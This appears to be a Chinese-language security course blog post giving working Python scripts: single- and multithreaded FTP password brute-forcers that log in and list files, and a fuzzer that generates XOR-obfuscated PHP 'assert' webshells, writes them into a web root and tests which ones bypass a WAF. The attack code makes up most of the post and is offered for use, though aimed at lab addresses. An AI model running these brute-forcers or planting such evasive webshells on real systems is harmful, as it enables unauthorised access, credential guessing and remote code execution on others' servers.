78:Python开发-多线程Fuzz&Waf异或免杀&爆破

本课知识点:
  • 协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术
学习目的:
  • 掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等
案例1:简单多线程技术实现脚本
  • queue,threading模块使用

案例2:利用FTP模块实现协议爆破脚本

  • 1.ftplib模块使用
  • 2.遍历用户及密码字典
  • 3.尝试连接执行命令判断
# Author:Serena

import ftplib

#简单的模拟登录测试
#爆破:IP、端口、用户名、密码字典

def ftp_brute():
    ftp = ftplib.FTP()

    for username in open('ftp-user.txt'):
        for password in open('ftp-pwd.txt'):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            try:
                ftp.connect('192.168.56.110', 21)
                ftp.login(username,password)
                print(username+'|'+password+'| ok')
                list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
                print(list)
            except ftplib.all_errors:
                pass

if __name__ == '__main__':
    ftp_brute()
ftp_brute_单线程
# Author:Serena

import ftplib,sys,queue,threading

#简单的模拟登录测试
#爆破:IP、端口、用户名、密码字典
import queue
import threading

def ftp_brute(ip,port):
    ftp = ftplib.FTP()
    ftp.connect(ip,port)
    while not q.empty():
        dict = q.get()
        dict = dict.split('|')
        username = dict[0]
        password = dict[1]
        try:
            ftp.login(username,password)
            print(username+'|'+password+'| ok')
            list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
            print(list)
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
            pass

if __name__ == '__main__':
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    q = queue.Queue()
    for username in open(userfile):
        for password in open(passfile):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            q.put(username + '|' + password)

    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute,args=(ip,port))
        t.start()

# 命令行执行:python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10
# 可以再优化一下:检测到争取的用户名密码后停止
ftp_brute_多线程

案例3:配合Fuzz实现免杀异或shell脚本

  • 1.免杀异或shell原理讲解及开发思路(参考及举例:!^@,"^?等)
  • 2.基于Fuzz思路生成大量Payload代码并有序命名写入网站文件中
  • 3.基于多线程实现批量访问shell文件并提交测试是否正常连接回显
# Author:Serena
import time
import requests
import threading,queue

def bypass_check():
    while not q.empty():
        filename = q.get()
        url = "http://127.0.0.1:8081/x/" + filename
        datas = {
            'x ': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if "XIAODI-PC" in result:
            print('check ->' + filename+'->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)

if __name__ == '__main__':
    q = queue.Queue()
    for i in range(1,127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f:
                f.write(code)
                print("Fuzz文件生成成功")
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()
Bypass

涉及资源:

  • fuzzdb(https://github.com/zhanye/fuzzdb)
  • fuzzDicts(https://github.com/stemmm/fuzzDicts)
  • Webshell免杀绕过waf(https://www.cnblogs.com/liujizhou/p/11806497.html)
  • python ftplib模块(https://www.cnblogs.com/kaituorensheng/p/4480512.html)
  • PHP异或(https://blog.csdn.net/qq_41617034/article/details/104441032)
  • https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ,提取码:xiao
 
posted @ 2021-08-19 19:57  zhengna  阅读(469)  评论(0编辑  收藏  举报